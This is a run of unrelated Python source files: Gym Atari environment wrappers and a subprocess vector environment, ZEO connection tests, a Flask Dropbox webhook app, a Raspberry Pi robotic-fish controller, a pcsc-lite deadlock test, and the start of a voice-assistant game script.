def reset(self, **kwargs):
self._elapsed_steps = 0
return self.env.reset(**kwargs)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
super(NoopResetEnv, self).__init__(env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
super(FireResetEnv, self).__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
super(EpisodicLifeEnv, self).__init__(env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if 0 < lives < self.lives:
# for Qbert sometimes we stay in lives == 0 condition for a few
# frames so it's important to keep lives > 0, so that we only reset
# once the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
super(MaxAndSkipEnv, self).__init__(env)
# most recent raw observations (for max pooling across time steps)
shape = (2,) + env.observation_space.shape
self._obs_buffer = np.zeros(shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = info = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2:
self._obs_buffer[0] = obs
if i == self._skip - 1:
self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
super(ClipRewardEnv, self).__init__(env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
super(WarpFrame, self).__init__(env)
self.width = width
self.height = height
self.grayscale = grayscale
shape = (self.height, self.width, 1 if self.grayscale else 3)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
def observation(self, frame):
if self.grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
size = (self.width, self.height)
frame = cv2.resize(frame, size, interpolation=cv2.INTER_AREA)
if self.grayscale:
frame = np.expand_dims(frame, -1)
return frame
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also `LazyFrames`
"""
super(FrameStack, self).__init__(env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are
only stored once. It exists purely to optimize memory usage which can be
huge for DQN's 1M frames replay buffers.
This object should only be converted to numpy array before being passed
to the model. You'd not believe how complex the previous solution was.
"""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
class RewardShaping(gym.RewardWrapper):
"""Shaping the reward
For reward scale, func can be `lambda r: r * scale`
"""
def __init__(self, env, func):
super(RewardShaping, self).__init__(env)
self.func = func
def reward(self, reward):
return self.func(reward)
class VecFrameStack(object):
def __init__(self, env, k):
self.env = env
self.k = k
self.action_space = env.action_space
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
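# _worker runs in each SubprocVecEnv child process: it builds its own env from
# the cloudpickled factory, then services commands arriving over the pipe.
# Supported commands are 'step' (auto-resets when the episode ends), 'reset',
# 'reset_task', 'close' and 'get_spaces'; every reply goes back over the pipe.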
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env._reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(object):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
self.num_envs = len(env_fns)
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
zipped_args = zip(self.work_remotes, self.remotes, env_fns)
self.ps = [
Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zipped_args
]
for p in self.ps:
# if the main process crashes, we should not cause things to hang
p.daemon = True
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.observation_space = observation_space
self.action_space = action_space
def _step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def _step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def _reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
def step(self, actions):
self._step_async(actions)
return self._step_wait()
class Monitor(gym.Wrapper):
def __init__(self, env, info_keywords=None):
super(Monitor, self).__init__(env)
self._monitor_rewards = None
self._info_keywords = info_keywords or []
def reset(self, **kwargs):
self._monitor_rewards = []
return self.env.reset(**kwargs)
def step(self, action):
o_, r, done, info = self.env.step(action)
self._monitor_rewards.append(r)
if done:
info['episode'] = {
'r': sum(self._monitor_rewards),
'l': len(self._monitor_rewards)
}
for keyword in self._info_keywords:
info['episode'][keyword] = info[keyword]
return o_, r, done, info
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
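# Example usage (an illustrative sketch; the env id and hyper-parameters are
# arbitrary choices for the demo, not defaults of this module): build four
# vectorized CartPole environments and step them with random actions.
if __name__ == "__main__":
    envs = build_env('CartPole-v0', 'classic_control', vectorized=True, nenv=4,
                     max_episode_steps=200)
    obs = envs.reset()
    for _ in range(10):
        actions = [envs.action_space.sample() for _ in range(len(envs))]
        obs, rewards, dones, infos = envs.step(actions)
    envs.close()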
|
testConnection.py
|
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Test setup for ZEO connection logic.
The actual tests are in ConnectionTests.py; this file provides the
platform-dependent scaffolding.
"""
from __future__ import with_statement, print_function
from ZEO.tests import ConnectionTests, InvalidationTests
from zope.testing import setupstack
import os
if os.environ.get('USE_ZOPE_TESTING_DOCTEST'):
from zope.testing import doctest
else:
import doctest
import unittest
import ZODB.tests.util
import ZEO
from . import forker
class FileStorageConfig(object):
def getConfig(self, path, create, read_only):
return """\
<filestorage 1>
path %s
create %s
read-only %s
</filestorage>""" % (path,
create and 'yes' or 'no',
read_only and 'yes' or 'no')
class MappingStorageConfig(object):
def getConfig(self, path, create, read_only):
return """<mappingstorage 1/>"""
class FileStorageConnectionTests(
FileStorageConfig,
ConnectionTests.ConnectionTests,
InvalidationTests.InvalidationTests
):
"""FileStorage-specific connection tests."""
class FileStorageReconnectionTests(
FileStorageConfig,
ConnectionTests.ReconnectionTests,
):
"""FileStorage-specific re-connection tests."""
# Run this at level 1 because MappingStorage can't do reconnection tests
class FileStorageInvqTests(
FileStorageConfig,
ConnectionTests.InvqTests
):
"""FileStorage-specific invalidation queue tests."""
class FileStorageTimeoutTests(
FileStorageConfig,
ConnectionTests.TimeoutTests
):
pass
class MappingStorageConnectionTests(
MappingStorageConfig,
ConnectionTests.ConnectionTests
):
"""Mapping storage connection tests."""
# The ReconnectionTests can't work with MappingStorage because it's only an
# in-memory storage and has no persistent state.
class MappingStorageTimeoutTests(
MappingStorageConfig,
ConnectionTests.TimeoutTests
):
pass
class SSLConnectionTests(
MappingStorageConfig,
ConnectionTests.SSLConnectionTests,
):
pass
test_classes = [FileStorageConnectionTests,
FileStorageReconnectionTests,
FileStorageInvqTests,
FileStorageTimeoutTests,
MappingStorageConnectionTests,
MappingStorageTimeoutTests,
]
if not forker.ZEO4_SERVER:
test_classes.append(SSLConnectionTests)
def invalidations_while_connecting():
r"""
    As soon as a client registers with a server, it will receive
invalidations from the server. The client must be careful to queue
these invalidations until it is ready to deal with them. At the time
of the writing of this test, clients weren't careful enough about
    queuing invalidations. This led to cache corruption in the form of
both low-level file corruption as well as out-of-date records marked
as current.
    This test tries to provoke this bug by:
- starting a server
>>> addr, _ = start_server()
- opening a client to the server that writes some objects, filling
    its cache at the same time,
>>> import ZEO, ZODB.tests.MinPO, transaction
>>> db = ZEO.DB(addr, client='x')
>>> conn = db.open()
>>> nobs = 1000
>>> for i in range(nobs):
... conn.root()[i] = ZODB.tests.MinPO.MinPO(0)
>>> transaction.commit()
>>> import zope.testing.loggingsupport, logging
>>> handler = zope.testing.loggingsupport.InstalledHandler(
... 'ZEO', level=logging.INFO)
# >>> logging.getLogger('ZEO').debug(
# ... 'Initial tid %r' % conn.root()._p_serial)
- disconnecting the first client (closing it with a persistent cache),
>>> db.close()
- starting a second client that writes objects more or less
constantly,
>>> import random, threading, time
>>> stop = False
>>> db2 = ZEO.DB(addr)
>>> tm = transaction.TransactionManager()
>>> conn2 = db2.open(transaction_manager=tm)
>>> random = random.Random(0)
>>> lock = threading.Lock()
>>> def run():
... while 1:
... i = random.randint(0, nobs-1)
... if stop:
... return
... with lock:
... conn2.root()[i].value += 1
... tm.commit()
... #logging.getLogger('ZEO').debug(
... # 'COMMIT %s %s %r' % (
... # i, conn2.root()[i].value, conn2.root()[i]._p_serial))
... time.sleep(0)
>>> thread = threading.Thread(target=run)
>>> thread.setDaemon(True)
>>> thread.start()
- restarting the first client, and
- testing for cache validity.
>>> bad = False
>>> try:
... for c in range(10):
... time.sleep(.1)
... db = ZODB.DB(ZEO.ClientStorage.ClientStorage(addr, client='x'))
... with lock:
... #logging.getLogger('ZEO').debug('Locked %s' % c)
... @wait_until("connected and we have caught up", timeout=199)
... def _():
... if (db.storage.is_connected()
... and db.storage.lastTransaction()
... == db.storage._call('lastTransaction')
... ):
... #logging.getLogger('ZEO').debug(
... # 'Connected %r' % db.storage.lastTransaction())
... return True
...
... conn = db.open()
... for i in range(1000):
... if conn.root()[i].value != conn2.root()[i].value:
... print('bad', c, i, conn.root()[i].value, end=" ")
... print(conn2.root()[i].value)
... bad = True
... print('client debug log with lock held')
... while handler.records:
... record = handler.records.pop(0)
... print(record.name, record.levelname, end=' ')
... print(handler.format(record))
... #if bad:
... # with open('server.log') as f:
... # print(f.read())
... #else:
... # logging.getLogger('ZEO').debug('GOOD %s' % c)
... db.close()
... finally:
... stop = True
... thread.join(10)
>>> thread.isAlive()
False
>>> for record in handler.records:
... if record.levelno < logging.ERROR:
... continue
... print(record.name, record.levelname)
... print(handler.format(record))
>>> handler.uninstall()
>>> db.close()
>>> db2.close()
"""
def test_suite():
suite = unittest.TestSuite()
for klass in test_classes:
sub = unittest.makeSuite(klass, 'check')
sub.layer = ZODB.tests.util.MininalTestLayer(
klass.__name__ + ' ZEO Connection Tests')
suite.addTest(sub)
sub = doctest.DocTestSuite(
setUp=forker.setUp, tearDown=setupstack.tearDown,
)
sub.layer = ZODB.tests.util.MininalTestLayer('ZEO Connection DocTests')
suite.addTest(sub)
return suite
|
app.py
|
# Adapted from https://github.com/dropbox/mdwebhook
from hashlib import sha256
import hmac
import json
import os
import threading
from urllib.parse import urlparse
from dropbox.client import DropboxClient, DropboxOAuth2Flow
from flask import abort, Flask, redirect, render_template, request, session, url_for
# App key and secret from the App console (dropbox.com/developers/apps)
#APP_KEY = os.environ['APP_KEY']
#APP_SECRET = os.environ['APP_SECRET']
app = Flask(__name__)
app.config.from_pyfile('default_config.py')
if os.path.isfile('app_config.py'):
app.config.from_pyfile('app_config.py')
app.debug = True
def get_url(route):
'''Generate a proper URL, forcing HTTPS if not running locally'''
host = urlparse(request.url).hostname
url = url_for(
route,
_external=True,
_scheme='http' if host in ('127.0.0.1', 'localhost') else 'https'
)
return url
def get_flow():
return DropboxOAuth2Flow(
app.config['APP_KEY'],
app.config['APP_SECRET'],
get_url('oauth_callback'),
session,
'dropbox-csrf-token')
@app.route('/oauth_callback')
def oauth_callback():
'''Callback function for when the user returns from OAuth.'''
access_token, uid, extras = get_flow().finish(request.args)
    # NOTE: the original mdwebhook stored this per-user token in Redis and then
    # processed that user's delta; this adaptation uses the single app token
    # from the config, so we simply re-scan the configured path prefixes here.
    process_all()
return redirect(url_for('done'))
cursors = {}
files = set()
def process_prefix(prefix, verbose=True):
    '''Call /delta for the given path prefix and process any changes.'''
global cursors
global files
# OAuth token for the user
token = app.config['DROPBOX_APP_TOKEN']
# /delta cursor for the user (None the first time)
# cursor = redis_client.hget('cursors', uid)
cursor = cursors.get(prefix)
client = DropboxClient(token)
has_more = True
while has_more:
result = client.delta(cursor, path_prefix=prefix)
for path, metadata in result['entries']:
if verbose:
if metadata is None:
print("DELETED", path)
if path in files:
files.remove(path)
elif path in files:
print('MODIFIED', path, metadata.get('modifier'))
else:
print('ADDED', path, metadata.get('modifier'))
files.add(path)
# Update cursor
cursor = result['cursor']
cursors[prefix] = cursor
# Repeat only if there's more to do
has_more = result['has_more']
def process_all(verbose=True):
    '''Call /delta for every configured path prefix and process any changes.'''
print("CHANGES!")
for prefix in app.config['DROPBOX_PATH_PREFIXES']:
process_prefix(prefix, verbose=verbose)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/login')
def login():
return redirect(get_flow().start())
@app.route('/done')
def done():
return render_template('done.html')
def validate_request():
'''Validate that the request is properly signed by Dropbox.
(If not, this is a spoofed webhook.)'''
signature = request.headers.get('X-Dropbox-Signature')
    # hmac.new() requires a bytes key on Python 3, so encode the configured secret
    return signature == hmac.new(app.config['DROPBOX_APP_SECRET'].encode('utf-8'), request.data, sha256).hexdigest()
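# Helper for local testing (not part of the original mdwebhook app): compute the
# signature Dropbox would attach to a given request body, so /webhook can be
# exercised with curl or Flask's test client, e.g.
#   app.test_client().post('/webhook', data=b'{}',
#                          headers={'X-Dropbox-Signature': sign_body(b'{}')})
def sign_body(body):
    '''Return the X-Dropbox-Signature value for the given bytes body.'''
    return hmac.new(app.config['DROPBOX_APP_SECRET'].encode('utf-8'), body, sha256).hexdigest()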
@app.route('/webhook', methods=['GET'])
def challenge():
'''Respond to the webhook challenge (GET request) by echoing back the challenge parameter.'''
return request.args.get('challenge')
@app.route('/webhook', methods=['POST'])
def webhook():
'''Receive a list of changed user IDs from Dropbox and process each.'''
print("INCOMING")
# Make sure this is a valid request from Dropbox
if not validate_request(): abort(403)
#for uid in json.loads(request.data)['delta']['users']:
# We need to respond quickly to the webhook request, so we do the
# actual work in a separate thread. For more robustness, it's a
# good idea to add the work to a reliable queue and process the queue
# in a worker process.
threading.Thread(target=process_all).start()
return ''
if __name__=='__main__':
process_all(verbose=False)
app.run(debug=True, host='0.0.0.0', port=12345)
#threading.Thread(target=process_user, args=(uid,)).start()
|
exp_circle_cb.py
|
from lib_fin_simple_c import *
from time import sleep
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
import numpy as np
from lib_camera import Camera
import threading
from lib_leds import LEDS
from lib_depthsensor import DepthSensor
from lib_fin import Fin
from lib_photodiode import Photodiode
depth_sensor = DepthSensor()
depth_sensor.update()
surface_pressure = depth_sensor.pressure_mbar
leds = LEDS()
photodiode = Photodiode()
caudal = CaudalFin()
caudal.off()
pecl = PecLFin()
pecl.off()
pecr = PecRFin()
pecr.off()
dorsal = DorsalFin()
dorsal.off()
cam_l = Camera('left')
cam_r = Camera('right')
cam_l.colorbot_settings()
cam_r.colorbot_settings()
mask_l = np.loadtxt("/home/pi/fishfood/mask_l.txt", dtype=np.int32)
mask_r = np.loadtxt("/home/pi/fishfood/mask_r.txt", dtype=np.int32)
mask_cb = np.loadtxt("/home/pi/fishfood/mask_cb.txt", dtype=np.int32)
img_dark = 255*np.ones((192, 256))
sensor_value = 0
pecl_state = 0
pecr_state = 0
dorsal_state = 0
dive = 0
caudal.off()
dorsal.off()
pecl.down()
pecr.down()
sleep(1)
pecl.off()
pecr.off()
caudal.off()
dorsal.off()
def update_sensor_local():
global sensor_value
cam_l.capture()
cam_r.capture()
L = cam_l.img
R = cam_r.img
LM = np.multiply(img_dark-L[:, :, 2], mask_cb)
RM = np.multiply(img_dark-R[:, :, 2], mask_cb)
LA = np.multiply(LM, mask_l)
RA = np.multiply(RM, mask_r)
sensor_value = (np.sum(LA) > 30) or (np.sum(RA) > 30) #fb check 30 threshold
def update_sensor():
x = threading.Thread(target=update_sensor_local)
x.start()
def rotate_left(T_caudal, N_pectoral, N_dorsal, t_caudal, t_cam):
global pecl_state
global pecr_state
global dorsal_state
global dive
caudal.left()
pecl.off()
if (dive == 1):
if (dorsal_state == 0):
dorsal.left()
else:
dorsal.right()
# Ensure pectoral fin is in right position so first flip generates thrust
if (pecr_state == 0):
pecr.down()
else:
pecr.up()
# --------------------------------------------------------
# GENERATE TIMINGS AND EVENTS SEQUENCE
#---------------------------------------------------------
t_pectoral = np.linspace(0, T_caudal, N_pectoral + 1)
t_pectoral = np.delete(t_pectoral, 0)
t_dorsal = np.linspace(0, T_caudal, N_dorsal + 1)
t_dorsal = np.delete(t_dorsal, 0)
t = np.array([0])
t = np.append(t, t_pectoral)
t = np.append(t, t_dorsal)
t = np.append(t, t_caudal)
t = np.append(t, t_cam)
waits = np.diff(np.sort(t))
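    # t now holds every event time within one caudal period: the N_pectoral
    # pectoral flips, the N_dorsal dorsal flips, the caudal reversal at t_caudal
    # and the camera update at t_cam. Sorting and differencing these absolute
    # times yields the successive sleep() intervals consumed in the loop below.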
events = 1*np.ones(N_pectoral)
events = np.append(events, 2*np.ones(N_dorsal))
events = np.append(events, [3])
events = np.append(events, [4])
# SORT EVENTS
t_events = np.delete(t, 0)
inds = t_events.argsort()
events = events[inds]
events = events.astype(int)
#----------------------------------------------------------
for i in range(np.size(waits)):
sleep(waits[i])
if (events[i] == 1):
if (pecr_state == 0):
pecr.up()
else:
pecr.down()
pecr_state = 1 - pecr_state
if (events[i] == 2 and dive == 1):
if (dorsal_state == 0):
dorsal.right()
else:
dorsal.left()
dorsal_state = 1 - dorsal_state
if (events[i] == 3):
caudal.right()
if (events[i] == 4):
update_sensor()
def rotate_right(T_caudal, N_pectoral, N_dorsal, t_caudal, t_cam):
global pecl_state
global pecr_state
global dorsal_state
global dive
caudal.right()
pecr.off()
if (dive == 1):
if (dorsal_state == 0):
dorsal.right()
else:
dorsal.left()
# Ensure pectoral fin is in right position so first flip generates thrust
if (pecl_state == 0):
pecl.down()
else:
pecl.up()
# --------------------------------------------------------
# GENERATE TIMINGS AND EVENTS SEQUENCE
#---------------------------------------------------------
t_pectoral = np.linspace(0, T_caudal, N_pectoral + 1)
t_pectoral = np.delete(t_pectoral, 0)
t_dorsal = np.linspace(0, T_caudal, N_dorsal + 1)
t_dorsal = np.delete(t_dorsal, 0)
t = np.array([0])
t = np.append(t, t_pectoral)
t = np.append(t, t_dorsal)
t = np.append(t, t_caudal)
t = np.append(t, t_cam)
waits = np.diff(np.sort(t))
events = 1*np.ones(N_pectoral)
events = np.append(events, 2*np.ones(N_dorsal))
events = np.append(events, [3])
events = np.append(events, [4])
# SORT EVENTS
t_events = np.delete(t, 0)
inds = t_events.argsort()
events = events[inds]
events = events.astype(int)
#----------------------------------------------------------
for i in range(np.size(waits)):
sleep(waits[i])
if (events[i] == 1):
if (pecl_state == 0):
pecl.up()
else:
pecl.down()
pecl_state = 1 - pecl_state
if (events[i] == 2 and dive == 1):
if (dorsal_state == 0):
dorsal.left()
else:
dorsal.right()
dorsal_state = 1 - dorsal_state
if (events[i] == 3):
caudal.left()
if (events[i] == 4):
update_sensor()
def idle():
"""Waiting for starting signal
"""
thresh_photodiode = 50 # lights off: 2, lights on: 400 -> better range!
while photodiode.brightness > thresh_photodiode:
photodiode.update()
leds.on()
sleep(1)
leds.off()
sleep(2)
leds.on()
sleep(1)
leds.off()
sleep(2)
idle()
'''
depth_mm = 0
pecl.off()
pecr.off()
caudal.off()
while (depth_mm < 600):
dorsal.left()
sleep(0.1)
dorsal.right()
sleep(0.1)
depth_sensor.update()
depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779)
dorsal.off()
'''
#for i in range(240):
for i in range(round(240*0.4/0.3)):
if (sensor_value == True):
#rotate_left(0.4, 5, 3, 0.25, 0.3)
rotate_left(0.25, 5, 3, 0.15, 0.3)
else:
#rotate_right(0.4, 5, 3, 0.25, 0.3)
rotate_right(0.25, 5, 3, 0.15, 0.3)
GPIO.cleanup()
|
SCardBeginTransaction_deadlock.py
|
#! /usr/bin/env python
# SCardBeginTransaction_deadlock.py: Unitary test for locking in
# SCardBeginTransaction, SCardTransmit, SCardStatus and SCardReconnect
# Copyright (C) 2012 Ludovic Rousseau
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, see <http://www.gnu.org/licenses/>.
# [Muscle] [PATCH] fix deadlock in PCSC-Lite
# http://archives.neohapsis.com/archives/dev/muscle/2012-q2/0109.html
# fixed in revisions 6358, 6359, 6360 and 6361
from smartcard.scard import *
from smartcard.pcsc.PCSCExceptions import *
import threading
import time
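# Scenario (per the patch discussion referenced above): the main thread holds a
# transaction on the card while this second thread performs SCardReconnect (and,
# in the commented-out variants, SCardBeginTransaction, SCardTransmit or
# SCardStatus), operations that deadlocked in pcsc-lite before revisions 6358-6361.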
def myThread(reader):
print "thread 2: SCardConnect"
hresult, hcard2, dwActiveProtocol = SCardConnect(hcontext1, reader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_ANY)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
# wait for the 1st thread to begin a transaction
time.sleep(1)
"""
# check for SCardBeginTransaction
print "thread 2: SCardBeginTransaction"
hresult = SCardBeginTransaction(hcard2)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 2: SCardEndTransaction"
hresult = SCardEndTransaction(hcard2, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
"""
"""
# check for SCardTransmit()
SELECT = [0x00, 0xA4, 0x00, 0x00, 0x02, 0x3F, 0x00]
print "thread 2: SCardTransmit"
hresult, response = SCardTransmit(hcard2, dwActiveProtocol, SELECT)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print response
"""
"""
# check for SCardStatus()
print "thread 2: SCardStatus"
hresult, reader, state, protocol, atr = SCardStatus(hcard2)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
"""
# check for SCardReconnect()
print "thread 2: SCardReconnect"
hresult, dwActiveProtocol = SCardReconnect(hcard2,
SCARD_SHARE_SHARED, SCARD_PROTOCOL_ANY, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 2: SCardDisconnect"
hresult = SCardDisconnect(hcard2, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 1: SCardEstablishContext"
hresult, hcontext1 = SCardEstablishContext(SCARD_SCOPE_USER)
if hresult != SCARD_S_SUCCESS:
raise EstablishContextException(hresult)
print "thread 1: SCardListReaders"
hresult, readers = SCardListReaders(hcontext1, [])
if hresult != SCARD_S_SUCCESS:
raise ListReadersException(hresult)
print 'PC/SC Readers:', readers
reader = readers[0]
print "Using reader:", reader
# second thread
t = threading.Thread(target=myThread, args=(reader, ))
t.start()
# give the 2nd thread time to connect before starting the transaction
time.sleep(0.5)
print "thread 1: SCardConnect"
hresult, hcard1, dwActiveProtocol = SCardConnect(hcontext1, reader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_ANY)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 1: SCardBeginTransaction"
hresult = SCardBeginTransaction(hcard1)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
time.sleep(2)
print "thread 1: SCardEndTransaction"
hresult = SCardEndTransaction(hcard1, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
# give time to thread2 to finish
time.sleep(1)
print "thread 1: SCardDisconnect"
hresult = SCardDisconnect(hcard1, SCARD_LEAVE_CARD)
if hresult != SCARD_S_SUCCESS:
raise BaseSCardException(hresult)
print "thread 1: SCardReleaseContext"
hresult = SCardReleaseContext(hcontext1)
if hresult != SCARD_S_SUCCESS:
raise ReleaseContextException(hresult)
|
game.py
|
from random import *
import playsound
from tkinter import *
from PIL import Image, ImageTk
from threading import Thread
import speech_recognition as sr
import pyttsx3
import time
from pynput.keyboard import Key, Controller
def closeWindow():
keyboard = Controller()
keyboard.press(Key.alt_l)
keyboard.press(Key.f4)
keyboard.release(Key.f4)
keyboard.release(Key.alt_l)
try:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id) #male
engine.setProperty('volume', 1)
except Exception as e:
print(e)
def speak(text):
print(text)
engine.say(text)
engine.runAndWait()
